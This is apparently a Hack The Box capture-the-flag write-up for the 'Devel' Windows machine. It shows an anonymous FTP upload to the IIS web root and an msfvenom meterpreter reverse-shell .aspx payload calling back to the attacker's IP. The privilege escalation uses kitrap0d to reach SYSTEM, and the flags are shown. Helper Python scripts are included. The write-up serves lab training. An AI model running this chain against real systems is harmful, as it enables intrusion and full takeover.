Devel HTB Write-up

Machine IP - 10.10.10.5

Initial Phase

Starting with an nmap scan, we get the following -

root@kali:~/Desktop/Hack The Box/devel# nmap -F 10.10.10.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-20 09:17 +04
Nmap scan report for 10.10.10.5
Host is up (0.22s latency).
Not shown: 98 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 7.88 seconds

This gives two services to work with. A full scan of all 65535 ports is started in the background while these two are looked at.

The website shows the default IIS 7 landing page.

Meanwhile, the complete scan of all ports comes back with the same two ports as the fast scan, so FTP and HTTP are the only services to go on.

Uniscan and dirb against the IP address turn up nothing useful. Dirb does at least confirm an ASP.NET server by finding the aspnet_client directory -

root@kali:~/Desktop/Hack The Box/devel# dirb http://10.10.10.5/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Mar 20 09:58:14 2019
URL_BASE: http://10.10.10.5/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.5/ ----
==> DIRECTORY: http://10.10.10.5/aspnet_client/

---- Entering directory: http://10.10.10.5/aspnet_client/ ----
==> DIRECTORY: http://10.10.10.5/aspnet_client/system_web/

---- Entering directory: http://10.10.10.5/aspnet_client/system_web/ ----

-----------------
END_TIME: Wed Mar 20 10:51:19 2019
DOWNLOADED: 13836 - FOUND: 0

Now, turning to FTP, anonymous login is worth a try. It works, and we get the following -

root@kali:~/Desktop/Hack The Box/devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp>

This is the same aspnet_client directory that dirb found over HTTP. welcome.png is the IIS 7 image shown on the landing page and iisstart.htm is the default IIS start page, so the FTP root is very likely the IIS web root. Whether the anonymous user can also write to it is checked by uploading a small test file -

root@kali:~/Desktop/Hack The Box/devel# cat > hello.html
this is a test file for tanq
root@kali:~/Desktop/Hack The Box/devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> put hello.html
local: hello.html remote: hello.html
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
30 bytes sent in 0.00 secs (207.7793 kB/s)

Browsing to http://10.10.10.5/hello.html confirms that the upload landed and that the web server serves it, so the FTP root and the IIS web root are the same directory.
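The two manual steps above (read the FTP listing, upload a marker, fetch it over HTTP) are worth scripting, because the same check applies to any box that exposes anonymous FTP next to a web server. The following is an added example and not part of the original write-up: it parses the Microsoft FTP Service `dir` format, decides whether the listing looks like an IIS web root, and, when given a host, uploads a random marker file and checks that HTTP returns it. The script name, the e-mail used as the anonymous password and the `probe_*.html` file name are arbitrary choices; the embedded sample listing is the one obtained from 10.10.10.5 above.

```python
#!/usr/bin/env python3
"""Does an anonymous FTP root double as the web root, and is it writable?

Added example, not code from the original write-up. Assumes the FTP and HTTP
services share one directory tree (what the write-up finds by hand); the marker
file name, the anonymous password and the script name are arbitrary.
"""
import ftplib
import io
import re
import secrets
import sys
import urllib.error
import urllib.request

# Microsoft FTP Service (Windows_NT) listing: "03-18-17  01:06AM  <DIR>  aspnet_client"
_MSFTP_LINE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?P<size><DIR>|\d+)\s+(?P<name>.+?)\s*$"
)

# Files IIS ships in its default site; two of them in one directory is a strong hint.
IIS_ROOT_MARKERS = {"iisstart.htm", "welcome.png", "aspnet_client"}


def parse_msftp_listing(text):
    """Turn `dir`/LIST output from a Microsoft FTP Service into dicts."""
    entries = []
    for line in text.splitlines():
        m = _MSFTP_LINE.match(line.strip())
        if not m:
            continue  # "226 Transfer complete." and other status lines are skipped
        is_dir = m.group("size") == "<DIR>"
        entries.append({
            "name": m.group("name"),
            "is_dir": is_dir,
            "size": 0 if is_dir else int(m.group("size")),
            "mtime": f"{m.group('date')} {m.group('time')}",
        })
    return entries


def looks_like_iis_webroot(entries):
    """True when at least two IIS default-site files sit in the listing."""
    names = {e["name"].lower() for e in entries}
    return len(names & IIS_ROOT_MARKERS) >= 2


def served_matches(marker, body):
    """The web server serves our upload iff the response body carries the marker."""
    return marker in body


def ftp_write_check(host, url_base, timeout=10):
    """Upload a random marker via anonymous FTP, fetch it via HTTP, clean up.

    Returns (uploaded, served). Network code: only reached from main().
    """
    marker = secrets.token_hex(8)
    name = f"probe_{marker}.html"
    ftp = ftplib.FTP(host, timeout=timeout)
    ftp.login("anonymous", "probe@example.com")  # any e-mail-looking password
    listing = []
    ftp.retrlines("LIST", listing.append)
    print(f"[*] FTP root looks like an IIS web root: "
          f"{looks_like_iis_webroot(parse_msftp_listing(chr(10).join(listing)))}")
    try:
        ftp.storbinary(f"STOR {name}", io.BytesIO(marker.encode()))
    except ftplib.error_perm as exc:
        print(f"[-] anonymous user cannot write: {exc}")
        ftp.quit()
        return False, False
    served = False
    try:
        with urllib.request.urlopen(url_base.rstrip("/") + "/" + name, timeout=timeout) as resp:
            served = served_matches(marker, resp.read().decode(errors="replace"))
    except urllib.error.URLError as exc:
        print(f"[-] marker not reachable over HTTP (FTP root != web root?): {exc}")
    finally:
        try:
            ftp.delete(name)  # remove the marker whether or not it was served
        except ftplib.error_perm:
            pass
        ftp.quit()
    return True, served


# Listing taken from the write-up's FTP session above.
SAMPLE_LISTING = """\
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
"""

if __name__ == "__main__":
    if len(sys.argv) == 3:  # e.g. 10.10.10.5 http://10.10.10.5/
        print(ftp_write_check(sys.argv[1], sys.argv[2]))
    else:
        entries = parse_msftp_listing(SAMPLE_LISTING)
        print(entries, looks_like_iis_webroot(entries))
```

Run offline with no arguments to see the parser on the sample listing, or as `python3 probe.py 10.10.10.5 http://10.10.10.5/` against the box. A result of (True, False) means the upload worked but the file is not served, which is the "FTP root is not the web root" case; (True, True) is the situation on this machine. The marker is a static .html file, so it only proves that uploads are served; whether the server executes uploads is what the .aspx payload in the next step tests.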

So anything placed in this folder is reachable from the browser, and if the server executes the uploaded file, our code runs on the box. Since the server is IIS with ASP.NET, an .aspx file is the natural choice: IIS hands .aspx requests to the ASP.NET handler, which compiles and runs them. First we confirm the server type and pick a reverse shell payload -

root@kali:~/Desktop/Hack The Box/devel# whatweb 10.10.10.5
http://10.10.10.5 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/7.5], IP[10.10.10.5], Microsoft-IIS[7.5][Under Construction], Title[IIS7], X-Powered-By[ASP.NET]
root@kali:~/Desktop/Hack The Box/devel# msfvenom --list payloads | grep windows | grep meterpreter | grep reverse_tcp
    windows/meterpreter/reverse_tcp           Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    windows/meterpreter/reverse_tcp_allports  Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
    windows/meterpreter/reverse_tcp_dns       Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    windows/meterpreter/reverse_tcp_rc4       Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    ...

Therefore, we can use the first payload that is listed.

root@kali:~/Desktop/Hack The Box/devel# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.68 LPORT=4444 -f aspx > develtanq.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2798 bytes

Now we log onto FTP again and put the file into the web server directory. With a listener waiting, navigating to the file will hand us the reverse shell.

root@kali:~/Desktop/Hack The Box/devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put develtanq.aspx
local: develtanq.aspx remote: develtanq.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2834 bytes sent in 0.00 secs (22.3365 MB/s)

Now we keep a listener open and trigger the aspx file by navigating to http://10.10.10.5/develtanq.aspx.

root@kali:~/Desktop/Hack The Box/devel# msfconsole -q
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.68
LHOST => 10.10.14.68
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.68:4444
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.68:4444 -> 10.10.10.5:49162) at 2019-03-23 17:39:32 +0400

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter >

That gives us a meterpreter session on the machine, running as whatever account the IIS application pool uses rather than as an administrator. From here, Metasploit's exploit suggester can pick the privilege escalation candidates.

root@kali:~/Desktop/Hack The Box/devel# msfconsole -q
msf5 > search suggest

Matching Modules
================

   Name                                             Disclosure Date  Rank    Check  Description
   ----                                             ---------------  ----    -----  -----------
   auxiliary/server/icmp_exfil                                       normal  No     ICMP Exfiltration Service
   exploit/windows/browser/ms10_018_ie_behaviors    2010-03-09       good    No     MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
   exploit/windows/smb/timbuktu_plughntcommand_bof  2009-06-25       great   No     Timbuktu PlughNTCommand Named Pipe Buffer Overflow
   post/multi/recon/local_exploit_suggester                          normal  No     Multi Recon Local Exploit Suggester
   post/osx/gather/enum_colloquy                                     normal  No     OS X Gather Colloquy Enumeration

The post/multi/recon/local_exploit_suggester module is the one we want. It runs inside the meterpreter session and executes the check routine of every local exploit module that matches the session's platform and architecture -

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

The suggester lists thirteen candidates. "The target appears to be vulnerable" means the module's own check passed; "could not be validated" only means the affected component is present and the check could not decide either way. We can try them one by one, starting with the first -

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_eventvwr
msf5 exploit(windows/local/bypassuac_eventvwr) > show options

Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf5 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/bypassuac_eventvwr) > exploit

[*] Started reverse TCP handler on 192.168.72.128:4444
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/bypassuac_eventvwr) > show options

Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.72.128   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf5 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.10.14.68
LHOST => 10.10.14.68
msf5 exploit(windows/local/bypassuac_eventvwr) > set LPORT 4445
LPORT => 4445
msf5 exploit(windows/local/bypassuac_eventvwr) > exploit

[*] Started reverse TCP handler on 10.10.14.68:4445
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.
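The failure above was predictable before the module ran: a UAC bypass only turns an administrator's UAC-filtered token into a full one, so it can never help a session whose user is not in the local Administrators group, and fixing LHOST changes nothing. A `getuid` in the session would have shown that up front. The following is an added example, not part of the original write-up, that parses the suggester output and orders the candidates by what the session actually has: UAC bypasses are set aside unless the user is an administrator, the ms16_075_reflection modules are kept only when the session holds SeImpersonatePrivilege (which service accounts such as IIS application pool identities normally do), and everything else is ranked by the suggester's verdict. The module families and their prerequisites are assumptions drawn from how those Metasploit modules behave, not data the suggester prints; the sample input is the suggester output above.

```python
#!/usr/bin/env python3
"""Triage local_exploit_suggester output before firing modules one by one.

Added example, not code from the original write-up. Category rules are
assumptions about Metasploit module behaviour: bypassuac_* modules refuse to run
unless the session user is in the local Administrators group (the error the
write-up hits), and ms16_075_reflection* need SeImpersonatePrivilege, which
service accounts such as IIS application pool identities usually hold.
"""
import re

# "[+] 10.10.10.5 - exploit/windows/local/foo: The target appears to be vulnerable."
_HIT = re.compile(
    r"^\[\+\]\s+\S+\s+-\s+(?P<module>exploit/\S+?):\s+(?P<verdict>.+?)\.?$"
)

# Higher is better: a passed check beats "running but could not be validated".
VERDICT_SCORE = {
    "The target appears to be vulnerable": 20,
    "The target service is running, but could not be validated": 10,
}


def categorise(module):
    """Assumed prerequisite family of a module (see module docstring)."""
    if "/bypassuac" in module:
        return "uac_bypass"
    if "/ms16_075_reflection" in module:
        return "impersonation"
    return "local_exploit"


def parse_suggester(text):
    """Return [(module, verdict)] for every [+] line of the suggester output."""
    hits = []
    for line in text.splitlines():
        m = _HIT.match(line.strip())
        if m:
            hits.append((m.group("module"), m.group("verdict").rstrip(".")))
    return hits


def triage(hits, in_admins_group=False, has_seimpersonate=True):
    """Split hits into (ranked, skipped).

    ranked:  [(module, verdict, note)] in the order worth trying
    skipped: [(module, reason)] modules whose prerequisite the session lacks
    """
    ranked, skipped = [], []
    for module, verdict in hits:
        cat = categorise(module)
        bonus = 0
        note = "direct LPE from an unprivileged token; kernel-mode ones can crash the host"
        if cat == "uac_bypass":
            if not in_admins_group:
                skipped.append((module, "session user not in Administrators; UAC bypass cannot apply"))
                continue
            bonus, note = 3, "UAC bypass: elevates an admin's filtered token, no kernel risk"
        elif cat == "impersonation":
            if not has_seimpersonate:
                skipped.append((module, "needs SeImpersonatePrivilege"))
                continue
            bonus, note = 2, "token impersonation via SeImpersonatePrivilege, no kernel risk"
        score = VERDICT_SCORE.get(verdict, 0) + bonus
        ranked.append((score, module, verdict, note))
    ranked.sort(key=lambda r: (-r[0], r[1]))  # best score first, then by name
    return [(m, v, n) for _, m, v, n in ranked], skipped


# Suggester output copied from the session above.
SAMPLE_SUGGESTER = """\
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
"""

if __name__ == "__main__":
    ranked, skipped = triage(parse_suggester(SAMPLE_SUGGESTER))
    for module, verdict, note in ranked:
        print(f"try   {module:<65} {verdict} [{note}]")
    for module, reason in skipped:
        print(f"skip  {module:<65} {reason}")
```

With the defaults (not an administrator, SeImpersonatePrivilege present) the order starts with the two ms16_075_reflection modules, then the "appears to be vulnerable" local exploits, and the four "could not be validated" ones last, with bypassuac_eventvwr listed under skip. The ranking is a starting order, not a guarantee: kitrap0d sits near the bottom of this list and is the one that works on this box, so the loop of trying candidates in turn is still needed; the script just removes the ones that cannot work.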

The module fails the same way both times, regardless of LHOST: the error says the session's user is not in the local Administrators group, and a UAC bypass can only elevate a token that already belongs to an administrator. We need an exploit that works from an unprivileged user, so we try the next one on the list -

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  5                yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.68      yes       The listen address (an interface may be specified)
   LPORT     4445             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)

msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST tun0
LHOST => tun0
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 4448
LPORT => 4448
msf5 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.68:4448
[*] Launching notepad to host the exploit...
[+] Process 3820 launched.
[*] Reflectively injecting the exploit DLL into 3820...
[*] Injecting exploit into 3820 ...
[*] Exploit injected. Injecting payload into 3820...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 8 opened (10.10.14.68:4448 -> 10.10.10.5:49163) at 2019-03-23 18:10:26 +0400

meterpreter > shell
[-] Unknown command: shell.
meterpreter > sessions -i 8
meterpreter > shell
Process 2680 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\system

c:\windows\system32\inetsrv>cd ../../..
cd ../../..

c:\>cd Users
cd Users

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users

18/03/2017  01:16    <DIR>          .
18/03/2017  01:16    <DIR>          ..
18/03/2017  01:16    <DIR>          Administrator
17/03/2017  04:17    <DIR>          babis
18/03/2017  01:06    <DIR>          Classic .NET AppPool
14/07/2009  09:20    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  24.478.040.064 bytes free

c:\Users>cd babis\Desktop
cd babis\Desktop

c:\Users\babis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis\Desktop

18/03/2017  01:14    <DIR>          .
18/03/2017  01:14    <DIR>          ..
18/03/2017  01:18                32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.478.040.064 bytes free

c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8

c:\Users\babis\Desktop>cd ../../
cd ../../

c:\Users>cd Administrator\Desktop
cd Administrator\Desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator\Desktop

18/03/2017  01:17    <DIR>          .
18/03/2017  01:17    <DIR>          ..
18/03/2017  01:17                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.478.040.064 bytes free

c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a0b5041708797c4fc4728bc72b4b

That gives us a shell as NT AUTHORITY\SYSTEM, from which both user.txt (on babis's desktop) and root.txt (on the Administrator's desktop) can be read.